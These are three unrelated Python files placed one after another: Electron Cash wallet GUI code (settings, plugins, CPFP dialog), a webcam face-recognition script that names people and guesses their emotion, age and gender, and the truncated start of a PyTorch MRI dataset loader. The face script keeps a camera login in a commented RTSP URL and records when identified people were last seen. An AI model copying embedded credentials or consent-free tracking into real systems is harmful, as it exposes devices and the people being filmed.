self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.config.get('show_cashaddr', False):
return QIcon(":icons/tab_converter.png")
else:
return QIcon(":icons/tab_converter_bw.png")
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
def toggle_cashaddr_status_bar(self):
self.toggle_cashaddr(not self.config.get('show_cashaddr', False))
def toggle_cashaddr_settings(self, state):
self.toggle_cashaddr(state == Qt.Checked)
def toggle_cashaddr(self, on):
self.config.set_key('show_cashaddr', on)
Address.show_cashaddr(on)
for window in self.gui_object.windows:
window.cashaddr_toggled_signal.emit()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
cashaddr_cb = QCheckBox(_('CashAddr address format'))
cashaddr_cb.setChecked(Address.FMT_UI == Address.FMT_CASHADDR)
cashaddr_cb.setToolTip(_("If unchecked, addresses are shown in legacy format"))
cashaddr_cb.stateChanged.connect(self.toggle_cashaddr_settings)
gui_widgets.append((cashaddr_cb, None))
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages
language_names = []
language_keys = []
for item in languages.items():
language_keys.append(item[0])
language_names.append(item[1])
lang_combo.addItems(language_names)
try:
index = language_keys.index(self.config.get("language",''))
except ValueError:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
self.fee_slider_mogrifier()
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom Fee Rate'), _('Custom Fee Rate in Satoshis per byte'))
fee_widgets.append((customfee_label, customfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['BCH', 'mBCH', 'cash']
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 cash.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BCH':
self.decimal_point = 8
elif unit_result == 'mBCH':
self.decimal_point = 5
elif unit_result == 'cash':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electroncash import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def on_opret(x):
self.config.set_key('enable_opreturn', bool(x))
if not x:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
self.message_opreturn_e.setHidden(not x)
self.opreturn_label.setHidden(not x)
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(on_opret)
tx_widgets.append((opret_cb,None))
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def internal_plugins_dialog(self):
self.internalpluginsdialog = d = WindowModalDialog(self, _('Optional Features'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def external_plugins_dialog(self):
from . import external_plugins_window
self.externalpluginsdialog = d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
|
main.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import face_recognition
import cv2
import numpy as np
import pymongo
import sys
import time
import logging as log
from imutils.video import WebcamVideoStream
from openvino.inference_engine import IENetwork, IEPlugin
from sklearn.metrics.pairwise import cosine_similarity
import requests
import subprocess
import datetime as dt
from multiprocessing import Process, Queue
from imutils import face_utils
import dlib
import json
import socket
import base64
import pickle
import jsonpickle
import zmq
em_client = pymongo.MongoClient("mongodb://localhost:27017/")
dblist = em_client.list_database_names()
if "Main_DB" in dblist:
print("========================")
print("Main_db found in Mongo")
print("========================")
em_db = em_client["Main_DB"]
em_col = em_db["face_info"]
prev_face_col = em_db["face_logs"]
# run docker and connect to api
subprocess.call("./docker_run.sh")
addr = 'http://localhost:5000'
test_url = addr + '/api/test'
q = Queue(maxsize=100)
# emotion task scheduler
def process_task():
global test_url, em_col
while True:
item = q.get()
if item['eof'] is True:
print("break")
break
elif item is None:
continue
name = item['face_id']
faces = item['frame']
filename = '/home/vysakh/Accubits/INTEL/Accelerated-Face-Reidentification-and-Emotion-Recognition' \
'/docker_fetch/image' + str(name) + '.jpg'
cv2.imwrite(filename, faces)
# get response
params = {'arg1': name}
response = requests.post(test_url, data=params)
print(response.text)
del response, item
q.put({'eof': True})
# container function to initialise OpenVINO models
def init_model(xml, bins):
model_xml = xml
model_bin = bins
# Plugin initialization for specified device and load extensions library if specified
plugin = IEPlugin(device='CPU')
plugin.add_cpu_extension(
'/opt/intel/openvino/inference_engine/lib/intel64/libcpu_extension_sse4.so')
log.info("Reading IR...")
net = IENetwork(model=model_xml, weights=model_bin)
if plugin.device == "CPU":
supported_layers = plugin.get_supported_layers(net)
not_supported_layers = [l for l in net.layers.keys() if l not in supported_layers]
if len(not_supported_layers) != 0:
log.error("Following layers are not supported by the plugin for specified device {}:\n {}".
format(plugin.device, ', '.join(not_supported_layers)))
log.error("Please try to specify cpu extensions library path in demo's command line parameters using -l "
"or --cpu_extension command line argument")
sys.exit(1)
input_blob = next(iter(net.inputs))
out_blob = next(iter(net.outputs))
log.info("Loading IR to the plugin...")
exec_nets = plugin.load(network=net, num_requests=2)
n, c, h, w = net.inputs[input_blob].shape
del net
return exec_nets, n, c, w, h, input_blob, out_blob, plugin
def calculate_cosine(face_encodings, face_to_compare):
if len(face_encodings) == 0:
return np.empty(0)
sims = cosine_similarity(face_encodings, face_to_compare.reshape(1, -1))
return sims
def main():
emotion_list = ['neutral', 'happy', 'sad', 'surprise', 'anger'] # for parsing emotion detection result
gender_list = ['female', 'male'] # parse gender model result
# paths to models
face_xml = "utils/face-detection-adas-0001.xml"
face_bin = "utils/face-detection-adas-0001.bin"
emotion_xml = "utils/emotions-recognition-retail-0003.xml"
emotion_bin = "utils/emotions-recognition-retail-0003.bin"
age_gender_xml = "utils/age-gender-recognition-retail-0013.xml"
age_gender_bin = "utils/age-gender-recognition-retail-0013.bin"
landmark_model = "utils/shape_predictor_68_face_landmarks.dat"
context = zmq.Context()
footage_socket = context.socket(zmq.PUB)
footage_socket.connect('tcp://0.0.0.0:5555')
emotion_socket = context.socket(zmq.PUB)
emotion_socket.connect('tcp://0.0.0.0:5556')
# initialize emotion rec and age_gender models
exec_net, n, c, w, h, input_blob, out_blob, plugin = init_model(emotion_xml, emotion_bin)
age_gender_net, n_a, c_a, w_a, h_a, input_blob_a, out_blob_a, plugin_a = init_model(age_gender_xml, age_gender_bin)
face_detection_net, n_f, c_f, w_f, h_f, input_blob_f, out_blob_f, plugin_f = init_model(face_xml, face_bin)
landmark_predictor = dlib.shape_predictor(landmark_model)
# load known faces from DB
faces = list(em_col.find({}))
# Get a reference to webcam #0 (the default one)
# fvs = WebcamVideoStream(src='rtsp://admin:AccubitsEmotix@192.168.0.10:554/Streaming/channels/1/').start()
fvs = WebcamVideoStream(src=0).start()
time.sleep(0.5)
known_face_encodings = []
known_face_names = []
# Create arrays of known face encodings and their names
for face in faces:
for face_encods in face['encoding']:
known_face_encodings.append(np.asarray(face_encods))
known_face_names.append(face['name'])
# Initialize some variables
frame_count = 0
cur_request_id = 0
next_request_id = 1
cur_request_id_a = 0
next_request_id_a = 1
cur_request_id_f = 0
next_request_id_f = 1
emotion = None
initial_frame = fvs.read()
initial_h, initial_w = initial_frame.shape[:2]
while True:
# Grab a single frame of video
frame = fvs.read()
frame_copy = fvs.read()
if frame is None:
break
# Find all the faces and face encodings in the current frame of video
face_locations = []
face_locations_keypoint = []
in_frame = cv2.resize(frame, (w_f, h_f))
in_frame = in_frame.transpose((2, 0, 1)) # Change data layout from HWC to CHW
in_frame = in_frame.reshape((n_f, c_f, h_f, w_f))
face_detection_net.start_async(request_id=cur_request_id_f, inputs={input_blob: in_frame})
if face_detection_net.requests[cur_request_id_f].wait(-1) == 0:
face_detection_res = face_detection_net.requests[cur_request_id_f].outputs[out_blob_f]
for face_loc in face_detection_res[0][0]:
if face_loc[2] > 0.5:
xmin = abs(int(face_loc[3] * initial_w))
ymin = abs(int(face_loc[4] * initial_h))
xmax = abs(int(face_loc[5] * initial_w))
ymax = abs(int(face_loc[6] * initial_h))
face_locations.append((xmin, ymin, xmax, ymax))
face_locations_keypoint.append(dlib.rectangle(xmin, ymin, xmax, ymax))
face_encodings = face_recognition.face_encodings(frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Unknown"
# If a match was found in known_face_encodings, just use the first one.
if True in matches:
first_match_index = matches.index(True)
name = known_face_names[first_match_index]
face_names.append(name)
emotion_payload = []
# Display the results
for (left, top, right, bottom), name in zip(face_locations, face_names):
face = frame[top:bottom, left:right] # extract face
# run the emotion inference on extracted face
in_frame = cv2.resize(face, (w, h))
in_frame = in_frame.transpose((2, 0, 1)) # Change data layout from HWC to CHW
in_frame = in_frame.reshape((n, c, h, w))
exec_net.start_async(request_id=cur_request_id, inputs={input_blob: in_frame})
if exec_net.requests[cur_request_id].wait(-1) == 0:
res = exec_net.requests[cur_request_id].outputs[out_blob]
emotion_dict = dict()
emotion_dict['neutral'] = res[0][0][0][0]
emotion_dict['happy'] = res[0][1][0][0]
emotion_dict['sad'] = res[0][2][0][0]
emotion_dict['surprise'] = res[0][3][0][0]
emotion_dict['angry'] = res[0][4][0][0]
emotion_payload.append(emotion_dict)
emo_pred = np.argmax(res)
emotion = emotion_list[emo_pred]
# run age and gender inference
age_frame = cv2.resize(face, (w_a, h_a))
age_frame = age_frame.transpose((2, 0, 1))
age_frame = age_frame.reshape((n_a, c_a, h_a, w_a))
age_gender_net.start_async(request_id=cur_request_id_a, inputs={input_blob_a: age_frame})
if age_gender_net.requests[cur_request_id_a].wait(-1) == 0:
dec = age_gender_net.requests[cur_request_id_a].outputs
gender = dec['prob']
age = dec['age_conv3']
age = int(age[0][0][0][0] * 100)
gender = gender_list[np.argmax(gender)]
# add face to queue for emotyx module
if frame_count % 100 == 0:
_, face_id = str(dt.datetime.now()).split('.')
face_pic = frame_copy[top - 100:bottom + 100, left - 100:right + 100]
item = dict()
item['frame'] = face_pic
item['face_id'] = face_id
item['eof'] = False
q.put(item)
if name is not "Unknown":
if not list(prev_face_col.find({"name": name})):
prev_face_col.insert(
{'name': name, 'last_seen': dt.datetime.now(), 'image': 'face_logs/' + str(name) + '.jpg'})
else:
prev_face_col.update({'name': name}, {'$set': {'last_seen': dt.datetime.now()}})
cv2.imwrite('face_logs/' + str(name) + '.jpg', face)
overlay = frame.copy()
alpha = 0.6
cv2.rectangle(overlay, (left, top), (right, bottom), (65, 65, 65), 2)
cv2.rectangle(overlay, (right, top), (right + 150, top + 100), (65, 65, 65), cv2.FILLED)
cv2.addWeighted(overlay, alpha, frame, 1 - alpha,
0, frame)
# Draw a label with a name below the face
# cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
# cv2.rectangle(frame, (right, top), (right + 150, top + 100), (0, 125, 125), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, 'Name: ' + name, (right + 5, top + 20), font, 0.5, (255, 255, 255), 1)
cv2.putText(frame, 'Emotion: ' + emotion, (right + 5, top + 40), font, 0.5, (255, 255, 255), 1)
cv2.putText(frame, 'Gender: ' + gender, (right + 5, top + 60), font, 0.5, (255, 255, 255), 1)
cv2.putText(frame, 'Age: ' + str(age), (right + 5, top + 80), font, 0.5, (255, 255, 255), 1)
for loc in face_locations_keypoint:
shape = landmark_predictor(cv2.cvtColor(frame_copy, cv2.COLOR_BGR2GRAY), loc)
shape = face_utils.shape_to_np(shape)
for (x, y) in shape:
cv2.circle(frame, (x, y), 2, (0, 125, 125), -1)
# Display the resulting image
cv2.imshow('Video', frame)
frame_count += 1
cur_request_id, next_request_id = next_request_id, cur_request_id
cur_request_id_a, next_request_id_a = next_request_id_a, cur_request_id_a
cur_request_id_f, next_request_id_f = next_request_id_f, cur_request_id_f
# send to socket
encoded, buffer = cv2.imencode('.jpg', frame)
jpg_as_text = base64.b64encode(buffer)
footage_socket.send(jpg_as_text)
emotion_socket.send_json(jsonpickle.encode(emotion_payload))
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
q.put({'eof': True})
# Release handle to the webcam
fvs.stop()
cv2.destroyAllWindows()
del exec_net
del plugin
if __name__ == '__main__':
jobs = []
buff_dict = dict()
number_of_Threads = 2
for i in range(number_of_Threads):
t = Process(target=process_task)
jobs.append(t)
t.start()
main()
|
data.py
|
import sys
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
import os
import math
import multiprocessing as mp
import threading
import torch
from torch.utils.data import Dataset
import numpy as np
from utils import get_receptive_field, get_sub_patch_shape, \
get_offset, sample_coords, get_all_coords, nib_load
PATCH_SHAPE = (25, 25, 25)
KERNELS = ((3, 3, 3), )*8
SCALE_FACTOR = (3, 3, 3)
SHAPE = [240, 240, 155]
np.random.seed(2017)
class ImageList(Dataset):
def __init__(self,
list_file,
patch_shape=PATCH_SHAPE,
kernels=KERNELS,
scale_factor=SCALE_FACTOR,
root='',
split='valid',
sample_size=20):
with open(list_file) as f:
names = f.read().splitlines()
names = [os.path.join(root, name) for name in names]
self.root = root
self.names = names
self.split = split
self.sample_size = sample_size
self.receptive_field = get_receptive_field(kernels)
self.patch_shape = np.array(patch_shape)
self.scale_factor = np.array(scale_factor)
self.sub_patch_shape = get_sub_patch_shape(self.patch_shape,
self.receptive_field, self.scale_factor)
self.sub_off = get_offset(self.scale_factor, self.receptive_field)
self.modalities = ('Flair', 'T1c', 'T1', 'T2')
self.C = len(self.modalities)
def coord_to_slice(self, coord):
return coord[:, 0], coord[:, 1] + 1
def coord_to_sub_slice(self, coord):
lo = coord[:, 0] + self.sub_off
num = self.patch_shape - self.receptive_field + 1
hi = lo + self.scale_factor*self.receptive_field + \
np.ceil((num*1.0)/self.scale_factor - 1) * self.scale_factor
hi = hi.astype('int')
m = lo < 0
pl = -lo * m
lo[lo < 0] = 0
m = hi > SHAPE
ph = (hi - SHAPE) * m
hi += pl
pad = zip(pl, ph)
return lo, hi, pad
def crop(self, coords, label, path):
N = coords.shape[0]
